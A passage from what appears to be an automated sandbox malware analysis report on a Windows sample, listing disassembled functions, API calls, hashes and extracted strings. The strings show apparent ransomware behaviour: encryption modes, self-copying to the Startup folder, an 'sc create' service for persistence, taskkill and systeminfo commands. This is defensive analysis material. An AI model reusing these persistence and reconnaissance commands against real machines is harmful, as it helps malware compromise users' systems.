                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 829835001-0
                                                                                                        • Opcode ID: f0ee9ab6eec153329ef721081132f6d8808a6c778cd2797a28cd64c8c6362e90
                                                                                                        • Instruction ID: 319c4fcf6de28ad13ac59d8f7abd88e10a5d312083a98c6ba3cb034496e775c1
                                                                                                        • Opcode Fuzzy Hash: f0ee9ab6eec153329ef721081132f6d8808a6c778cd2797a28cd64c8c6362e90
                                                                                                        • Instruction Fuzzy Hash: D221B571A583509BD720DF58ED45B5AB7E8EB48B50F0402ABEC06A7390EF746900C795
                                                                                                        Function 00A71960 Relevance: .0, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextRandomRelease__onexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2784917694-0
                                                                                                        • Opcode ID: a92f706c92cd7e8c209f86678734ee0049fa0584c2bf551a0fcb7dff2dc1e8ea
                                                                                                        • Instruction ID: bf650b93a067ba0f05a97efcf78994b27c9c31968be0387ec8a6b17928924a4f
                                                                                                        • Opcode Fuzzy Hash: a92f706c92cd7e8c209f86678734ee0049fa0584c2bf551a0fcb7dff2dc1e8ea
                                                                                                        • Instruction Fuzzy Hash: B6F02772A44348ABD711DFC8ED12B5A77E4E708B10F0006BEE516977C0DB7555008641
                                                                                                        Function 00A9C27C Relevance: 63.5, APIs: 5, Strings: 31, Instructions: 509fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3784 a9c27c 3785 a9c281-a9c329 call aa90a0 * 3 3784->3785 3786 a9c27c call a97c10 3784->3786 3796 a9c32f-a9c343 3785->3796 3797 a9c422-a9c44e call a78780 call aa13c0 3785->3797 3786->3785 3799 a9c382-a9c385 3796->3799 3800 a9c345-a9c348 3796->3800 3816 a9c510-a9c852 call a82870 GetModuleFileNameW call aa1260 call a836f0 call a83590 call aa11d0 call a749c0 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call a93dd0 call a78780 call aa13c0 call aa12d0 call a83100 3797->3816 3817 a9c454-a9c50b call aa13c0 * 2 call aa1360 call aa9040 call aa9580 call aa1ac0 * 2 call aa1660 call a78780 call aa1ac0 * 2 3797->3817 3803 a9c3c2-a9c3c5 3799->3803 3804 a9c387-a9c38a 3799->3804 3802 a9c350-a9c35a 3800->3802 3802->3802 3808 a9c35c-a9c37d 3802->3808 3805 a9c3fd-a9c41c SetErrorMode SetConsoleTitleW call a858e0 3803->3805 3806 a9c3c7-a9c3ca 3803->3806 3809 a9c390-a9c39a 3804->3809 3805->3797 3819 a9e585-a9e5a2 call b005bb 3805->3819 3810 a9c3d0-a9c3da 3806->3810 3808->3799 3809->3809 3813 a9c39c-a9c3bd 3809->3813 3810->3810 3814 a9c3dc-a9c3f9 3810->3814 3813->3803 3814->3805 3940 a9c854-a9c85b 3816->3940 3941 a9c8b6-a9c8cb call a85d90 * 2 3816->3941 3817->3816 3940->3941 3943 a9c85d-a9c864 3940->3943 3950 a9c8cd-a9c8ec call a85d90 * 2 3941->3950 3951 a9c8f2-a9ca02 call aa10a0 call aa10c0 call aaa4d0 call aa1a90 call a78a80 call aa11d0 call a749c0 call aa10a0 call aa10c0 call aaa4d0 call a78a80 call aa9d90 call aa11d0 call a749c0 * 2 call a84500 call aa12b0 3941->3951 3943->3941 3945 a9c866-a9c872 call aaafa0 3943->3945 3945->3941 3952 a9c874-a9c8b3 call aa12d0 * 2 call a792a0 3945->3952 3950->3951 3997 a9ca04-a9ca06 3951->3997 3952->3941 3998 a9cad8-a9cb15 call aa12d0 call a74a20 call a749c0 3997->3998 3999 a9ca0c-a9caca call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 call aa12d0 call a74a20 call a749c0 3997->3999 4013 a9cb92-a9cbb5 call aa9b40 3998->4013 4014 a9cb17-a9cb8d call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 3998->4014 3999->3998 4067 a9cacc-a9cad3 3999->4067 4022 a9cbbc-a9cbf0 call aa12d0 call a74a20 4013->4022 4023 a9cbb7 call a90fa0 4013->4023 4014->4013 4038 a9cc32 4022->4038 4039 a9cbf2-a9cc30 call aa12d0 call a74a20 4022->4039 4023->4022 4044 a9cc39-a9cc41 4038->4044 4039->4038 4039->4044 4049 a9cc5d-a9cc7f call a749c0 4044->4049 4050 a9cc43-a9cc57 call a749c0 4044->4050 4061 a9d02b-a9d1f1 call b18980 call aa37b0 call aa9130 call a73730 call aa3740 call b18980 call a85e60 call ab5c80 call b18980 call a9e5b0 call b18980 call a9e750 call aa0230 call ab2590 call aa0230 call ab23c0 4049->4061 4062 a9cc85-a9ccc2 call aa12d0 call a74a20 call a749c0 4049->4062 4050->4049 4137 a9d1f7-a9d200 4061->4137 4079 a9ccc4-a9ccd1 call aa11a0 4062->4079 4080 a9ccd6-a9ccdc 4062->4080 4067->3997 4079->4080 4083 a9cce0-a9ccfb call aa12d0 call a7aed0 4080->4083 4092 a9cd0d-a9d026 call b18980 call aa3b00 call aa0cc0 call aaae30 call aa3a90 call aa1bd0 * 2 call aa1400 * 2 call aa1360 call aa1b10 call aa1ac0 call aa1360 call aa1b10 call aa1ac0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa1170 call aa11a0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa11a0 call a77fe0 call aa1b10 call aa1ac0 call aa1a60 call aa1a90 call aa1ac0 call a749c0 call aa1ac0 call a749c0 call aa1ac0 * 4 call a7ac80 4083->4092 4093 a9ccfd 4083->4093 4274 a9d82e-a9d891 call b18980 call a776c0 call ab1ba0 call aa1260 call aa0e90 4092->4274 4095 a9ccff-a9cd02 4093->4095 4096 a9cd04-a9cd0b Sleep 4093->4096 4095->4092 4095->4096 4096->4083 4137->4137 4139 a9d202-a9d26e call a77e30 call aa1b10 call aa1ac0 call aa1360 * 2 4137->4139 4162 a9d270-a9d279 4139->4162 4162->4162 4164 a9d27b-a9d291 call aa1a90 4162->4164 4169 a9d297-a9d2a0 4164->4169 4169->4169 4171 a9d2a2-a9d2c1 call a83f00 4169->4171 4177 a9d2c6-a9d2cf 4171->4177 4177->4177 4179 a9d2d1-a9d30a call aa95d0 call aa1b10 call aa1ac0 4177->4179 4194 a9d310-a9d319 4179->4194 4194->4194 4196 a9d31b-a9d825 call aa1c10 call a77e30 call aa1b10 call aa1ac0 call b18980 call aa37b0 call aa8f40 call aa9580 call aa9470 call a73730 call aa1ac0 * 2 call aa3740 call aa10a0 call aa10c0 call aaa4d0 call b18980 call aa37b0 call aa9490 call aa9470 call aa1ac0 call aa9490 call aa9470 call aa1ac0 call aa3740 call aa1c10 call a84670 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call b18980 call aa3b00 call a73730 call aa3a90 call aa12d0 call a91c90 call a7ac80 call a749c0 call aa1ac0 * 2 call a7b040 call aa1ac0 call a7b040 call aa1ac0 * 5 call a77d70 call a86020 * 2 4194->4196 4196->4274 4418 a9d829 call a7b040 4196->4418 4296 a9d8a3-a9dba9 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 10 call aa1bd0 call aa1660 call b25282 call aa1bd0 call aa1660 call b25282 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 8 call aa90a0 4274->4296 4297 a9d893-a9d89e call aa1170 4274->4297 4449 a9dbaf-a9dbc0 call a7f5e0 4296->4449 4450 a9dd17-a9dd28 call aa90a0 4296->4450 4297->4296 4418->4274 4455 a9e4a4-a9e580 call a78780 call aa1ac0 * 3 call a749c0 call a778d0 call a749c0 * 2 call aa1ac0 * 8 call a749c0 * 3 call aa1ac0 4449->4455 4456 a9dbc6-a9dcb7 call aa9b40 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call a749c0 * 5 call aa1090 * 2 call b259c6 4449->4456 4457 a9dd2e-a9e0a3 call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 4450->4457 4458 a9e450-a9e461 call aa90a0 4450->4458 4455->3819 4561 a9dcb9-a9dd00 call aa9c70 call aa11d0 call a749c0 call aa1090 * 2 call b259c6 4456->4561 4562 a9dd03-a9dd12 call a749c0 4456->4562 4647 a9e0a9-a9e42f call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call a75240 * 2 4457->4647 4648 a9e434-a9e44e call a75240 * 2 4457->4648 4467 a9e491-a9e49d call a8f570 4458->4467 4468 a9e463-a9e478 call a8daf0 * 2 4458->4468 4467->4455 4482 a9e49f 4467->4482 4468->4455 4493 a9e47a-a9e48f call a8daf0 * 2 4468->4493 4482->4455 4487 a9e49f call a8f570 4482->4487 4487->4455 4493->4455 4561->4562 4562->4455 4647->4648 4648->4455
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A9C3FF
                                                                                                        • SetConsoleTitleW.KERNEL32(asykat), ref: 00A9C40A
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 00A9C523
                                                                                                        • CopyFileW.KERNEL32(00000000,00000000,00000000,00B4945D,000000FF), ref: 00A9C5E3
                                                                                                        • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00A9C65D
                                                                                                          • Part of subcall function 00A93DD0: GetCurrentThread.KERNEL32 ref: 00A93E13
                                                                                                          • Part of subcall function 00A93DD0: OpenThreadToken.ADVAPI32(00000000), ref: 00A93E1A
                                                                                                          • Part of subcall function 00A93DD0: GetLastError.KERNEL32 ref: 00A93E24
                                                                                                          • Part of subcall function 00A93DD0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 00A93E3B
                                                                                                          • Part of subcall function 00A93DD0: OpenProcessToken.ADVAPI32(00000000), ref: 00A93E42
                                                                                                          • Part of subcall function 00A93DD0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 00A93E59
                                                                                                          • Part of subcall function 00A93DD0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A93E84
                                                                                                          • Part of subcall function 00A93DD0: LocalAlloc.KERNEL32(00000040,00000014), ref: 00A93E96
                                                                                                          • Part of subcall function 00A93DD0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00A93EAA
                                                                                                          • Part of subcall function 00A93DD0: GetLengthSid.ADVAPI32(?), ref: 00A93EBB
                                                                                                          • Part of subcall function 00A93DD0: LocalAlloc.KERNEL32(00000040,00000010), ref: 00A93EC7
                                                                                                          • Part of subcall function 00A93DD0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 00A93EDC
                                                                                                          • Part of subcall function 00A93DD0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 00A93EF4
                                                                                                          • Part of subcall function 00A93DD0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00A93F0C
                                                                                                          • Part of subcall function 00A85D90: GlobalMemoryStatusEx.KERNEL32(AE695AF0), ref: 00A85DAF
                                                                                                          • Part of subcall function 00A84500: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,AE695AF0), ref: 00A84565
                                                                                                          • Part of subcall function 00A84500: NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
                                                                                                          • Part of subcall function 00A84500: NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                                                                                        • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.K0H$21L0I$:\Documents and Settings\$:\Users\$Dflt$Fast$Manual_Mini_Config$Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$asykat$asykat$user$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                                                                                        • API String ID: 2029459818-3079872959
                                                                                                        • Opcode ID: 825c4186893e8430affd24fa43a9a2beafb36567976cde47bc714844cdd5ea25
                                                                                                        • Instruction ID: 6ef4abc568082a10c17db28da798e8a860263a467ba08288f0bde582652dd984
                                                                                                        • Opcode Fuzzy Hash: 825c4186893e8430affd24fa43a9a2beafb36567976cde47bc714844cdd5ea25
                                                                                                        • Instruction Fuzzy Hash: 1E22B135910258DADB15FB64CE41BEEB7B4AF15340F0480E9E40AA72D2EF705B89CF62
                                                                                                        Function 00A91C90 Relevance: 52.7, APIs: 4, Strings: 25, Instructions: 1975COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A85920: PathIsNetworkPathA.SHLWAPI(?,00B6AB14,?,?,?,AE695AF0), ref: 00A859A7
                                                                                                          • Part of subcall function 00A85920: __alloca_probe_16.LIBCMT ref: 00A859D7
                                                                                                          • Part of subcall function 00A85920: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,AE695AF0), ref: 00A859F1
                                                                                                          • Part of subcall function 00A85920: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,AE695AF0), ref: 00A85A0C
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D27
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D35
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D69
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D77
                                                                                                          • Part of subcall function 00A838C0: GetComputerNameExW.KERNEL32(00000000,?,?,AE695AF0,?), ref: 00A83941
                                                                                                          • Part of subcall function 00A838C0: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 00A839E0
                                                                                                          • Part of subcall function 00A7AE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7AE81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                                                                                        • String ID: | $ ~$,d5$21L0I$21L0I$:\Users\$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$api.ipify.org$user$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver
                                                                                                        • API String ID: 586396178-3008485653
                                                                                                        • Opcode ID: 5efc4ce22b03321ef42b66f53720ce15147ca52d6a66d21c7a21c9d7c0ef60c6
                                                                                                        • Instruction ID: 5b99006b7eb98453adab242e3bd60e8ce0c7202c0398440b7b8cbf35cef1a280
                                                                                                        • Opcode Fuzzy Hash: 5efc4ce22b03321ef42b66f53720ce15147ca52d6a66d21c7a21c9d7c0ef60c6
                                                                                                        • Instruction Fuzzy Hash: AD13CC71E102589FEF28EB24CD45BEEBBB5AF51304F1081D8E0496B292DB755B88CF91
                                                                                                        Function 00B378DD Relevance: 34.7, APIs: 23, Instructions: 194processsynchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6355 b378dd-b378e9 6356 b37903-b37907 6355->6356 6357 b378eb-b378fe call b259b3 call b25122 6355->6357 6356->6357 6359 b37909-b3790d 6356->6359 6371 b37af7-b37afa 6357->6371 6361 b37919-b3793e call b423d6 6359->6361 6362 b3790f-b37917 call b259a0 6359->6362 6369 b37940-b37955 call b34d66 * 2 6361->6369 6370 b37957-b3798f call b3769a 6361->6370 6362->6357 6384 b379b2-b379b4 6369->6384 6377 b37991-b379af call b34d66 * 3 6370->6377 6378 b379b9-b379c0 6370->6378 6377->6384 6379 b379c2-b379c4 6378->6379 6380 b379c5-b37a16 call b259a0 call b18980 CreateProcessA 6378->6380 6379->6380 6394 b37a18-b37a27 GetLastError call b2597d 6380->6394 6395 b37a3d-b37a43 6380->6395 6386 b37af5-b37af6 6384->6386 6386->6371 6408 b37a30-b37a32 6394->6408 6409 b37a29-b37a2a CloseHandle 6394->6409 6396 b37afb-b37b02 call b20f95 6395->6396 6397 b37a49-b37a4b 6395->6397 6399 b37a83-b37a86 6397->6399 6400 b37a4d-b37a6a WaitForSingleObject GetExitCodeProcess 6397->6400 6406 b37ac4-b37ac6 6399->6406 6407 b37a88-b37a8a 6399->6407 6404 b37a73-b37a75 6400->6404 6405 b37a6c-b37a6d CloseHandle 6400->6405 6410 b37a77-b37a78 CloseHandle 6404->6410 6411 b37a7e-b37a81 6404->6411 6405->6404 6412 b37ac8-b37ac9 CloseHandle 6406->6412 6413 b37acf-b37aef call b34d66 * 3 6406->6413 6414 b37a93-b37a95 6407->6414 6415 b37a8c-b37a8d CloseHandle 6407->6415 6416 b37aa0-b37ac2 call b34d66 * 3 6408->6416 6417 b37a34-b37a3b CloseHandle 6408->6417 6409->6408 6410->6411 6411->6416 6412->6413 6432 b37af1-b37af4 6413->6432 6419 b37a97-b37a98 CloseHandle 6414->6419 6420 b37a9e 6414->6420 6415->6414 6416->6432 6417->6416 6419->6420 6420->6416 6432->6386
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B423D6: _free.LIBCMT ref: 00B423F8
                                                                                                        • _free.LIBCMT ref: 00B3794E
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00B37A08
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00B37A18
                                                                                                        • __dosmaperr.LIBCMT ref: 00B37A1F
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A2A
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A35
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 00B37A4F
                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00B37A5C
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A6D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A78
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A98
                                                                                                        • _free.LIBCMT ref: 00B37AA3
                                                                                                        • _free.LIBCMT ref: 00B37AAF
                                                                                                        • _free.LIBCMT ref: 00B37ABB
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37AC9
                                                                                                        • _free.LIBCMT ref: 00B37943
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B37994
                                                                                                        • _free.LIBCMT ref: 00B3799F
                                                                                                        • _free.LIBCMT ref: 00B379AA
                                                                                                        • _free.LIBCMT ref: 00B37AD2
                                                                                                        • _free.LIBCMT ref: 00B37ADE
                                                                                                        • _free.LIBCMT ref: 00B37AEA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 4143445633-0
                                                                                                        • Opcode ID: f3a34523397d83e4209f6b2a57bdda3e01fbb080bcb86d02e816fe9c45438810
                                                                                                        • Instruction ID: f73b72afe94ddb7aa785c696bfd26e2cc284e7373ec6f21e5645fb8413bbbc68
                                                                                                        • Opcode Fuzzy Hash: f3a34523397d83e4209f6b2a57bdda3e01fbb080bcb86d02e816fe9c45438810
                                                                                                        • Instruction Fuzzy Hash: DF616EB1C04209BBDF21AFA4DC85AEEBBF9EF44311F2441A6F815A2251DB355B84CB61
                                                                                                        Function 00A83100 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 349COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6433 a83100-a8317f call aa9b40 6436 a83182-a8318b 6433->6436 6436->6436 6437 a8318d-a831a4 call aa6c20 6436->6437 6440 a831a7-a831b0 6437->6440 6440->6440 6441 a831b2-a83244 call aa80d0 * 2 6440->6441 6446 a83278-a83296 6441->6446 6447 a83246-a83258 6441->6447 6448 a83298-a832ad 6446->6448 6449 a832cd-a8330b 6446->6449 6450 a8325a-a83268 6447->6450 6451 a8326e-a83275 call b00c3c 6447->6451 6452 a832af-a832bd 6448->6452 6453 a832c3-a832ca call b00c3c 6448->6453 6454 a83310-a83319 6449->6454 6450->6451 6455 a83578 call b25132 6450->6455 6451->6446 6452->6453 6452->6455 6453->6449 6454->6454 6458 a8331b-a8336f call aa6c20 call aa80d0 6454->6458 6463 a8357d call b25132 6455->6463 6470 a83371-a83386 6458->6470 6471 a833a6-a833c0 GetFileAttributesW 6458->6471 6467 a83582-a83587 call b25132 6463->6467 6475 a83388-a83396 6470->6475 6476 a8339c-a833a3 call b00c3c 6470->6476 6473 a83400-a8340a GetFileAttributesW 6471->6473 6474 a833c2-a833d3 CreateDirectoryW 6471->6474 6480 a8340c-a83417 CreateDirectoryW 6473->6480 6481 a83441-a83447 6473->6481 6478 a833dc-a833e1 CreateDirectoryW 6474->6478 6479 a833d5-a833da CreateDirectoryW 6474->6479 6475->6463 6475->6476 6476->6471 6483 a833e3-a833f4 CreateDirectoryW * 3 6478->6483 6484 a833f6-a833fe CreateDirectoryW 6478->6484 6479->6478 6485 a83419-a83428 CreateDirectoryW * 2 6480->6485 6486 a8342a 6480->6486 6487 a83449-a8345b 6481->6487 6488 a8347b-a83495 6481->6488 6483->6481 6484->6481 6493 a83430-a8343a GetFileAttributesW 6485->6493 6486->6493 6489 a8345d-a8346b 6487->6489 6490 a83471-a83478 call b00c3c 6487->6490 6491 a834c9-a834e3 6488->6491 6492 a83497-a834a9 6488->6492 6489->6467 6489->6490 6490->6488 6497 a83513-a8352d 6491->6497 6498 a834e5-a834f7 6491->6498 6495 a834ab-a834b9 6492->6495 6496 a834bf-a834c6 call b00c3c 6492->6496 6493->6481 6499 a8343c-a8343f CreateDirectoryW 6493->6499 6495->6467 6495->6496 6496->6491 6500 a8355d-a83577 call b005bb 6497->6500 6501 a8352f-a83541 6497->6501 6504 a83509-a83510 call b00c3c 6498->6504 6505 a834f9-a83507 6498->6505 6499->6481 6506 a83553-a8355a call b00c3c 6501->6506 6507 